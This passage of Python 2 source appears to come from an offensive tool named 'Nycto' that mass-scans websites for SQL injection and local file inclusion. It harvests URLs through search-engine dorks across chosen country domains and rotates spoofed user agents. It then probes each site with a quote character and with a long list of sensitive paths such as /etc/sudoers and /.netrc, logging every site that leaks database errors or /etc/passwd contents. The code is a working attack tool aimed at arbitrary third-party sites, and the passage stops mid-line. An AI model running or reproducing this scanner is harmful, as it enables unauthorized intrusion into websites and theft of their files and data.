| "/.netrc", 688 | "/.forward", 689 | "/.cshrc", 690 | "/etc/default/passwd", 691 | "/etc/syslog.conf", 692 | "/etc/syslogd.conf", 693 | "/etc/release", 694 | "/etc/issue", 695 | "/etc/motd", 696 | "/etc/group", 697 | "/etc/fstab", 698 | "/etc/nsswitch.conf", 699 | "/etc/vfstab", 700 | "/etc/system", 701 | "/var/log/syslog", 702 | "/etc/netconfig", 703 | "/var/log/authlog", 704 | "/log/miscDir/accesslog", 705 | "/etc/sudoers", 706 | "/etc/updatedb.conf", 707 | "/etc/httpd/conf.d/ssl.conf", 708 | "/etc/httpd/conf.d/php.conf", 709 | "/etc/httpd/conf.d/squirrelmail.conf", 710 | "/var/log/httpd/error_log", 711 | "/var/log/httpd/access_log", 712 | "/var/log/apache/error_log", 713 | "/var/log/apache/access_log", 714 | "/var/log/apache2/error_log", 715 | "/var/log/apache2/access_log", 716 | "/etc/logrotate.d/httpd", 717 | "/var/run/httpd.pid", 718 | "/proc/cpuinfo", 719 | "/proc/version", 720 | "/etc/php.ini", 721 | "/etc/php.d/dom.ini", 722 | "/etc/php.d/gd.ini", 723 | "/etc/php.d/imap.ini", 724 | "/etc/php.d/json.ini", 725 | "/etc/php.d/ldap.ini", 726 | "/etc/php.d/mbstring.ini", 727 | "/etc/php.d/mysql.ini", 728 | "/etc/php.d/mysqli.ini", 729 | "/etc/php.d/odbc.ini", 730 | "/etc/php.d/pdo.ini", 731 | "/etc/php.d/pdo_mysql.ini", 732 | "/etc/php.d/pdo_pgsql.ini", 733 | "/etc/php.d/pdo_sqlite.ini", 734 | "/etc/php.d/pgsql.ini", 735 | "/etc/php.d/xmlreader.ini", 736 | "/etc/php.d/xmlwriter.ini", 737 | "/etc/php.d/xsl.ini", 738 | "/etc/php.d/zip.ini", 739 | "/etc/my.cnf", 740 | "/var/run/mysqld/mysqld.pid", 741 | "/var/log/mysqld.log", 742 | "/var/log/httpd/access.log", 743 | "/var/log/httpd/error.log", 744 | "/var/log/httpd/access_log", 745 | "/var/log/httpd/error_log", 746 | "/apache/logs/error_log", 747 | "/apache/logs/access_log", 748 | "/apache/logs/error.log", 749 | "/apache/logs/access.log", 750 | "/logs/error_log", 751 | "/logs/access_log", 752 | "/logs/error.log", 753 | "/logs/access.log", 754 | "/etc/httpd/logs/access_log", 755 | "/etc/httpd/logs/access.log", 756 | "/etc/httpd/logs/error_log", 757 | "/etc/httpd/logs/error.log", 758 | "/usr/local/apache/logs/access_log", 759 | "/usr/local/apache/logs/access.log", 760 | "/usr/local/apache/logs/error_log", 761 | "/usr/local/apache/logs/error.log", 762 | "/var/log/apache/access_log", 763 | "/var/log/apache/access.log", 764 | "/var/log/apache/error_log", 765 | "/var/log/apache/error.log", 766 | "/var/www/logs/access_log", 767 | "/var/www/logs/access.log", 768 | "/var/www/logs/error_log", 769 | "/var/www/logs/error.log", 770 | "/var/log/access_log", 771 | "/var/log/error_log", 772 | "/var/log/access.log", 773 | "/var/log/error.log", 774 | "/usr/local/apache2/logs/access_log", 775 | "/usr/local/apache2/logs/access.log", 776 | "/usr/local/apache2/logs/error_log", 777 | "/usr/local/apache2/logs/error.log", 778 | "/var/log/apache2/access_log", 779 | "/var/log/apache2/access.log", 780 | "/var/log/apache2/error_log", 781 | "/var/log/apache2/error.log", 782 | "/apache2/logs/error_log", 783 | "/apache2/logs/access_log", 784 | "/apache2/logs/error.log", 785 | "/apache2/logs/access.log", 786 | "/var/lib/mlocate/mlocate.db", 787 | "/proc/meminfo", 788 | "/proc/net/route", 789 | "/proc/net/tcp", 790 | "/proc/net/arp", 791 | "/proc/net/dev", 792 | "/proc/partitions", 793 | "/proc/mounts", 794 | "/proc/loadavg", 795 | "/boot/grub/grub.conf", 796 | "/etc/mailman/mm_cfg.py", 797 | "/etc/postfix/mydomains"] 798 | 799 | sqlerrors = {'MySQL': 'error in your SQL syntax', 800 | 'MiscError': 'mysql_fetch', 801 | 'MiscError2': 'num_rows', 802 | 'Oracle': 'ORA-01756', 803 | 'JDBC_CFM': 'Error Executing Database Query', 804 | 'JDBC_CFM2': 'SQLServer JDBC Driver', 805 | 'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server', 806 | 'MSSQL_Uqm': 'Unclosed quotation mark', 807 | 'MS-Access_ODBC': 'ODBC Microsoft Access Driver', 808 | 'MS-Access_JETdb': 'Microsoft JET Database', 809 | 'Error Occurred While Processing Request' : 'Error Occurred While Processing Request', 810 | 'Server Error' : 'Server Error', 811 | 'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error', 812 | 'Invalid Querystring' : 'Invalid Querystring', 813 | 'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC', 814 | 'VBScript Runtime' : 'VBScript Runtime', 815 | 'ADODB.Field' : 'ADODB.Field', 816 | 'BOF or EOF' : 'BOF or EOF', 817 | 'ADODB.Command' : 'ADODB.Command', 818 | 'JET Database' : 'JET Database', 819 | 'mysql_fetch_array()' : 'mysql_fetch_array()', 820 | 'Syntax error' : 'Syntax error', 821 | 'mysql_numrows()' : 'mysql_numrows()', 822 | 'GetArray()' : 'GetArray()', 823 | 'FetchRow()' : 'FetchRow()', 824 | 'Input string was not in a correct format' : 'Input string was not in a correct format', 825 | 'Not found' : 'Not found'} 826 | 827 | 828 | header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)', 829 | 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre', 830 | 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;', 831 | 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)', 832 | 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)', 833 | 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)', 834 | 'Microsoft Internet Explorer/4.0b1 (Windows 95)', 835 | 'Opera/8.00 (Windows NT 5.1; U; en)', 836 | 'amaya/9.51 libwww/5.4.0', 837 | 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)', 838 | 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)', 839 | 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)', 840 | 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)', 841 | 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)', 842 | 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]', 843 | 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' ] 844 | 845 | 846 | domains = {'All domains':['ac', 'ad', 'ae', 'af', 'ag', 'ai', 'al', 'am', 'an', 'ao', 847 | 'aq', 'ar', 'as', 'at', 'au', 'aw', 'ax', 'az', 'ba', 'bb', 848 | 'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'bj', 'bm', 'bn', 'bo', 849 | 'br', 'bs', 'bt', 'bv', 'bw', 'by', 'bz', 'ca', 'cc', 'cd', 850 | 'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'cr', 851 | 'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do', 852 | 'dz', 'ec', 'ee', 'eg', 'eh', 'er', 'es', 'et', 'eu', 'fi', 853 | 'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf', 854 | 'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gp', 'gq', 'gr', 'gs', 855 | 'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu', 856 | 'id', 'ie', 'il', 'im', 'in', 'io', 'iq', 'ir', 'is', 'it', 857 | 'je', 'jm', 'jo', 'jp', 'ke', 'kg', 'kh', 'ki', 'km', 'kn', 858 | 'kp', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk', 859 | 'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me', 860 | 'mg', 'mh', 'mk', 'ml', 'mm', 'mn', 'mo', 'mp', 'mq', 'mr', 861 | 'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'na', 'nc', 862 | 'ne', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz', 863 | 'om', 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn', 864 | 'pr', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'rs', 'ru', 865 | 'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si', 'sj', 866 | 'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'st', 'su', 'sv', 'sy', 867 | 'sz', 'tc', 'td', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm', 868 | 'tn', 'to', 'tp', 'tr', 'tt', 'tv', 'tw', 'tz', 'ua', 'ug', 869 | 'uk', 'um', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi', 870 | 'vn', 'vu', 'wf', 'ws', 'ye', 'yt', 'za', 'zm', 'zw', 'com', 871 | 'net', 'org','biz', 'gov', 'mil', 'edu', 'info', 'int', 'tel', 872 | 'name', 'aero', 'xxx','asia', 'cat', 'coop', 'jobs', 'mobi', 'museum', 873 | 'pro', 'travel'],'Default':['com','fr','net','edu','gov','info'],'Choose specific domain':[''],'Balcan':['al', 'bg', 'ro', 'gr', 'rs', 'hr', 874 | 'tr', 'ba', 'mk', 'mv', 'me'],'TLD':['xxx','edu', 'gov', 'mil', 875 | 'biz', 'cat', 'com', 'int','net', 'org', 'pro', 'tel', 'aero', 'asia', 876 | 'coop', 'info', 'jobs', 'mobi', 'name', 'museum', 'travel']} 877 | 878 | 879 | stecnt = 0 880 | for k,v in domains.items(): 881 | stecnt += 1 882 | print str(stecnt)+" - "+k 883 | sitekey = raw_input("\nChoose your target (if you don't know choose default) : ") 884 | 885 | if sitekey == "5": 886 | sitedomain = raw_input("\nChoose the specifics domain (e.g. fr or com...) for multiples domains separe with commas : ") 887 | if "," in sitedomain: 888 | site = sitedomain.split(',') 889 | sitearray = site 890 | else: 891 | sitearray = domains[domains.keys()[int(sitekey)-1]] 892 | sitearray[0] = sitedomain 893 | else : 894 | sitearray = domains[domains.keys()[int(sitekey)-1]] 895 | 896 | 897 | inurl = raw_input('\nEnter your dork (without "inurl") : ') 898 | numthreads = raw_input('Enter no. of threads : ') 899 | maxc = raw_input('Enter no. of pages : ') 900 | print "\nNumber of SQL errors :",len(sqlerrors) 901 | print "Number of LFI paths :",len(lfis) 902 | print "Number of headers :",len(header) 903 | print "Number of domains :",len(v) 904 | print "domains :",sitearray 905 | print "Number of threads :",numthreads 906 | print "Number of pages :",maxc 907 | print "Timeout in seconds :",timeout 908 | print "" 909 | 910 | 911 | 912 | 913 | def search(inurl, maxc): 914 | urls = [] 915 | for site in sitearray: 916 | site = site.strip() 917 | page = 0 918 | try: 919 | while page < int(maxc): 920 | jar = cookielib.FileCookieJar("cookies") 921 | query = inurl+"+site:"+site 922 | results_web = 'http://www.search-results.com/web?q='+query+'&hl=en&page='+repr(page)+'&src=hmp' 923 | request_web =urllib2.Request(results_web) 924 | agent = random.choice(header) 925 | request_web.add_header('User-Agent', agent) 926 | opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar)) 927 | text = opener_web.open(request_web).read() 928 | stringreg = re.compile('(?<=href=")(.*?)(?=")') 929 | names = stringreg.findall(text) 930 | page += 1 931 | for name in names: 932 | if name not in urls: 933 | if re.search(r'\(', name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name): 934 | pass 935 | elif re.search("google", name) or re.search("duckduckgo", name) or re.search("ixquick", name) or re.search("webcrawler", name) or re.search("dogpile", name) or re.search("yippy", name) or re.search("Bing", name) or re.search("youtube", name) or re.search("phpbuddy", name) or re.search("iranhack", name) or re.search("phpbuilder", name) or re.search("codingforums", name) or re.search("phpfreaks", name) or re.search("br.search.yahoo", name) or re.search("ajax.googleapis", name) or re.search("search.lycos", name) or re.search("gigablast", name) or re.search("web.search.naver", name) or re.search("dmoz", name) or re.search("%", name): 936 | pass 937 | else: 938 | urls.append(name) 939 | percent = int((1.0*page/int(maxc))*100) 940 | urls_len = len(urls) 941 | sys.stdout.write("\rSite: %s | Nycto Collected urls: %s | Percent Done: %s | Current page no.: %s <> " % (site,repr(urls_len),repr(percent),repr(page))) 942 | sys.stdout.flush() 943 | except(KeyboardInterrupt): 944 | pass 945 | tmplist = [] 946 | print "\n\n[+] URLS (unsorted): ",len(urls) 947 | for url in urls: 948 | try: 949 | host = url.split("/",3) 950 | domain = host[2] 951 | if domain not in tmplist and "=" in url: 952 | finallist.append(url) 953 | tmplist.append(domain) 954 | 955 | except: 956 | pass 957 | print "[+] URLS (sorted) : ",len(finallist) 958 | return finallist 959 | 960 | 961 | class injThread(threading.Thread): 962 | def __init__(self,hosts): 963 | self.hosts=hosts 964 | self.fcount = 0 965 | self.check = True 966 | threading.Thread.__init__(self) 967 | 968 | def run (self): 969 | urls = list(self.hosts) 970 | for url in urls: 971 | try: 972 | if self.check == True: 973 | ClassicINJ(url) 974 | else: 975 | break 976 | except(KeyboardInterrupt,ValueError): 977 | pass 978 | self.fcount+=1 979 | 980 | def stop(self): 981 | self.check = False 982 | 983 | class lfiThread(threading.Thread): 984 | def __init__(self,hosts): 985 | self.hosts=hosts 986 | self.fcount = 0 987 | self.check = True 988 | threading.Thread.__init__(self) 989 | 990 | def run (self): 991 | urls = list(self.hosts) 992 | for url in urls: 993 | try: 994 | if self.check == True: 995 | ClassicLFI(url) 996 | else: 997 | break 998 | except(KeyboardInterrupt,ValueError): 999 | pass 1000 | self.fcount+=1 1001 | 1002 | def stop(self): 1003 | self.check = False 1004 | 1005 | 1006 | def ClassicINJ(url): 1007 | EXT = "'" 1008 | host = url+EXT 1009 | try: 1010 | source = urllib2.urlopen(host).read() 1011 | for type,eMSG in sqlerrors.items(): 1012 | if re.search(eMSG, source): 1013 | print G+"\n [+] FOUND URL:", O+host, R+"Error:", type 1014 | logfile.write("\n"+host) 1015 | vuln.append(host) 1016 | 1017 | 1018 | else: 1019 | pass 1020 | except: 1021 | pass 1022 | 1023 | 1024 | def ClassicLFI(url): 1025 | lfiurl = url.rsplit('=', 1)[0] 1026 | if lfiurl[-1] != "=": 1027 | lfiurl = lfiurl + "=" 1028 | for lfi in lfis: 1029 | try: 1030 | check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read() 1031 | if re.findall("root:x", check): 1032 | print G+"\n [+] FOUND-URL: ", O+lfiurl+lfi 1033 | lfi_log_file.write("\n"+lfiurl+lfi) 1034 | vuln.append(lfiurl+lfi) 1035 | break 1036 | except: 1037 | pass 1038 | 1039 | def injtest(): 1040 | print G+"\n[+] Nycto is scanning sqli ..." 1041 | print "[+] Can take a while ..." 1042 | print "[!] Working ..." 1043 | i = len(usearch) / int(numthreads) 1044 | m = len(usearch) % int(numthreads) 1045 | z = 0 1046 | if len(threads) <= numthreads: 1047 | for x in range(0, int(numthreads)): 1048 | sliced = usearch[x*i:(x+1)*i] 1049 | if (z